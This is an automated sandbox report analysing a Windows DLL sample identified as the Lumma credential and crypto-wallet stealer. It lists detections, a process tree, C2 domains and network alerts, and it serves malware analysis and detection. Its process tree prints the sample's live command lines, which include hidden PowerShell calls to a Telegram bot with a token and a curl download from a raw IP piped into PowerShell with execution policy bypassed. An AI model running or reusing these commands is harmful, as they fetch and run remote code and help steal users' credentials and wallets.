Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iviewers.dll

Overview

General Information

Sample name:iviewers.dll
Analysis ID:1581496
MD5:690a4c9693ad790d6ee23492fe8bf869
SHA1:da39c94f65a34f2f2a72c6b2799f7d991a8c38d8
SHA256:320db923b7c701a6005e465a082ad48c2f3c8f36145ece15b4980a44202383fe
Tags:dlluser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Installs new ROOT certificates
LummaC encrypted strings found
Machine Learning detection for dropped file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Unusual Parent Process For Cmd.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6752 cmdline: loaddll32.exe "C:\Users\user\Desktop\iviewers.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2448 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 4600 cmdline: rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 1700 cmdline: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3752 cmdline: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7808 cmdline: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • curl.exe (PID: 7888 cmdline: curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
          • powershell.exe (PID: 7824 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • csc.exe (PID: 7300 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
              • cvtres.exe (PID: 7336 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF463.tmp" "c:\Users\user\AppData\Local\Temp\1yj35v5c\CSC1D664DFBC1CF4D3B97F036955FDEE5EE.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
            • RegAsm.exe (PID: 7548 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • regsvr32.exe (PID: 4324 cmdline: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • cmd.exe (PID: 1436 cmdline: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5300 cmdline: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7668 cmdline: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7868 cmdline: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • curl.exe (PID: 7956 cmdline: curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • powershell.exe (PID: 7880 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • csc.exe (PID: 5288 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
            • cvtres.exe (PID: 7184 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF461.tmp" "c:\Users\user\AppData\Local\Temp\wzlesmvi\CSC11B817DA9D55460CBF45133E7BAA649F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
          • RegAsm.exe (PID: 7552 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • rundll32.exe (PID: 1076 cmdline: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 1772 cmdline: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6512 cmdline: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7740 cmdline: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • curl.exe (PID: 7780 cmdline: curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • powershell.exe (PID: 7760 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • csc.exe (PID: 6620 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
            • cvtres.exe (PID: 7436 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF462.tmp" "c:\Users\user\AppData\Local\Temp\xyq5akbp\CSC3C74FAAA7254A90B38FFB13CA21DCB4.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
          • RegAsm.exe (PID: 6424 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • cmd.exe (PID: 7460 cmdline: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • powershell.exe (PID: 7476 cmdline: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 7424 cmdline: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7228 cmdline: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 6656 cmdline: curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • powershell.exe (PID: 6588 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 6024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 2044 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374.tmp" "c:\Users\user\AppData\Local\Temp\3vvszjlk\CSC1C049BEBEBAF4B45B9D79F1CA1976831.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • RegAsm.exe (PID: 3716 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 2196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["tentabatte.lat", "slipperyloo.lat", "wordyfindy.lat", "shapestickyr.lat", "bashfulacid.lat", "manyrestro.lat", "curverpluch.lat", "talkynicer.lat", "fivenaii.click"], "Build id": "VC6Dfm--TestOtctuk"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: powershell.exe PID: 7760JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Process Memory Space: powershell.exe PID: 7760INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xa1163:$b2: ::FromBase64String(
        • 0xa1193:$b2: ::FromBase64String(
        • 0xa11c3:$b2: ::FromBase64String(
        • 0xa2aa4:$b2: ::FromBase64String(
        • 0x10651:$s1: -join
        • 0x13bc5:$s1: -join
        • 0x29648:$s1: -join
        • 0x3671d:$s1: -join
        • 0x39aef:$s1: -join
        • 0x3a1a1:$s1: -join
        • 0x3bc92:$s1: -join
        • 0x3de98:$s1: -join
        • 0x3e6bf:$s1: -join
        • 0x3ef2f:$s1: -join
        • 0x3f66a:$s1: -join
        • 0x3f69c:$s1: -join
        • 0x3f6e4:$s1: -join
        • 0x3f703:$s1: -join
        • 0x3ff53:$s1: -join
        • 0x400cf:$s1: -join
        • 0x40147:$s1: -join
        Process Memory Space: powershell.exe PID: 7824JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 7824JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Process Memory Space: powershell.exe PID: 7824INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x6a483:$b2: ::FromBase64String(
            • 0x6a4b3:$b2: ::FromBase64String(
            • 0x6a4e3:$b2: ::FromBase64String(
            • 0x6bf30:$b2: ::FromBase64String(
            • 0x22b3f:$s1: -join
            • 0x88abc:$s1: -join
            • 0x88dd1:$s1: -join
            • 0x8901a:$s1: -join
            • 0x89321:$s1: -join
            • 0x89353:$s1: -join
            • 0x8939b:$s1: -join
            • 0x893c8:$s1: -join
            • 0x89bb7:$s1: -join
            • 0x89c7d:$s1: -join
            • 0x89cb8:$s1: -join
            • 0x89d0d:$s1: -join
            • 0x8af01:$s1: -join
            • 0x8f862:$s1: -join
            • 0xa7fb5:$s1: -join
            • 0x12f6f1:$s1: -join
            • 0x1319ec:$s1: -join
            Click to see the 6 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7620, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, ProcessId: 7760, ProcessName: powershell.exe
            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline", ProcessId: 6620, ProcessName: csc.exe
            Sigma detected: Unusual Parent Process For Cmd.EXE
            Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", CommandLine: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 4324, ParentProcessName: regsvr32.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", ProcessId: 1436, ProcessName: cmd.exe
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", CommandLine: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 4324, ParentProcessName: regsvr32.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", ProcessId: 1436, ProcessName: cmd.exe
            Sigma detected: Dynamic CSharp Compile Artefact
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7760, TargetFilename: C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", CommandLine: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1436, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", ProcessId: 5300, ProcessName: powershell.exe

            Data Obfuscation

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline", ProcessId: 6620, ProcessName: csc.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-27T22:33:13.149207+010020283713Unknown Traffic192.168.2.449746104.21.60.24443TCP
            2024-12-27T22:33:13.151135+010020283713Unknown Traffic192.168.2.449745104.21.60.24443TCP
            2024-12-27T22:33:13.174962+010020283713Unknown Traffic192.168.2.449747104.21.60.24443TCP
            2024-12-27T22:33:15.295801+010020283713Unknown Traffic192.168.2.449749104.21.60.24443TCP
            2024-12-27T22:33:15.632826+010020283713Unknown Traffic192.168.2.449750104.21.60.24443TCP
            2024-12-27T22:33:15.637538+010020283713Unknown Traffic192.168.2.449751104.21.60.24443TCP
